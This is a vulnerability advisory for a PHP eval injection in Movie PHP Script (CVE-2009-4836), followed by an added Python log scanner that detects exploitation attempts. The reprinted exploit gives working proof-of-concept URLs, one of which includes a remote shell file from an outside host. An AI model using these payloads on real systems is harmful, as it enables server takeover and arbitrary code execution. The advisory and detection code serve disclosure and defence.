Movie PHP Script 'system/services/init.php' Eval Injection Vulnerability

Vulnerability ID: 1117897  Vulnerability type: Code injection
Published: 2009-06-03  Updated: 2009-06-03
CVE ID: CVE-2009-4836  CNNVD ID: CNNVD-201005-052
Platform: PHP  CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/8871
https://www.securityfocus.com/bid/44452
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201005-052
|Vulnerability details
The system/services/init.php script in Movie PHP Script contains an eval injection vulnerability: the value of the anticode request parameter is passed straight to eval(), so a remote attacker can execute arbitrary PHP code on the server by supplying that parameter.
|Exploit
#################################################################################################################
[+] Movie PHP Script v2.0 Remote PHP Code Execution
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Remote PHP Code Execution

  - Vulnerable code in  system/services/init.php :

---------------------------------------------------------------------------------
Line 84 : @eval(stripslashes($_REQUEST['anticode']));
---------------------------------------------------------------------------------

- PoC : 

    http://127.0.0.1/[path/]system/services/init.php?anticode=[YOUR PHP CODE]

- Example : 

   http://127.0.0.1/path/system/services/init.php?anticode=include "http://www.darkmindz.com/shell/x2300_mod.txt";

- Example 2 :

  http://127.0.0.1/path/system/services/init.php?anticode=phpinfo();

#################################################################################################################

# milw0rm.com [2009-06-03]
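The defect above is a classic eval-on-request-input bug: because init.php reads from $_REQUEST, the injected code can arrive as a GET query string, a POST body or a cookie. The following is an added detection example (not part of the original advisory or of Movie PHP Script) that scans combined-format web server access logs for requests to the vulnerable path. A GET with an anticode parameter is reported with the decoded payload; a non-GET request to the same path is flagged for body inspection, since the access log alone cannot show POST or cookie data. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Apache/nginx combined format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jun/2009:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.11 - - [03/Jun/2009:10:00:02 +0000] "GET /system/services/init.php?anticode=phpinfo%28%29%3B HTTP/1.1" 200 8192 "-" "curl/7.19"
192.0.2.12 - - [03/Jun/2009:10:00:03 +0000] "POST /movies/system/services/init.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"
192.0.2.13 - - [03/Jun/2009:10:00:04 +0000] "GET /system/services/init.php?page=1 HTTP/1.1" 200 10 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTOCOL", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The affected script from the advisory; the install may sit under any web root prefix.
VULN_PATH_SUFFIX = "/system/services/init.php"


def parse_line(line):
    """Parse one combined-format log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs URL-decodes values, so the injected PHP is shown as the server saw it.
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return a finding label for a parsed record, or None if it is not relevant.

    'eval_injection' - GET with an anticode parameter: the injected PHP is visible in the log.
    'inspect_body'   - non-GET request to init.php: $_REQUEST also reads POST and cookie
                       values, which the access log does not record, so the body must be
                       checked elsewhere (WAF or reverse-proxy logs, PHP-level logging).
    """
    if not rec["path"].endswith(VULN_PATH_SUFFIX):
        return None
    if "anticode" in rec["query"]:
        return "eval_injection"
    if rec["method"] != "GET":
        return "inspect_body"
    return None


def find_findings(log_text):
    """Scan log text and return a list of (label, client_ip, path, anticode_values) tuples."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label is None:
            continue
        findings.append((label, rec["ip"], rec["path"], rec["query"].get("anticode", [])))
    return findings


if __name__ == "__main__":
    for label, ip, path, code in find_findings(SAMPLE_LOG):
        print(f"{label:15} {ip:12} {path} {code}")
```

Run against the sample, the scanner reports the GET from 192.0.2.11 with the decoded payload `phpinfo();` and flags the POST from 192.0.2.12 for body inspection; the ordinary page requests are ignored. Because stripslashes() is applied before eval(), magic_quotes does not mitigate the bug, so the fix is to remove the eval() call (or upgrade past the affected version) rather than to filter input.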
|References

Source: VUPEN
Name: ADV-2009-1495
Link: http://www.vupen.com/english/advisories/2009/1495
Source: MILW0RM
Name: 8871
Link: http://www.milw0rm.com/exploits/8871
Source: SECUNIA
Name: 35283
Link: http://secunia.com/advisories/35283
Source: OSVDB
Name: 54883
Link: http://osvdb.org/54883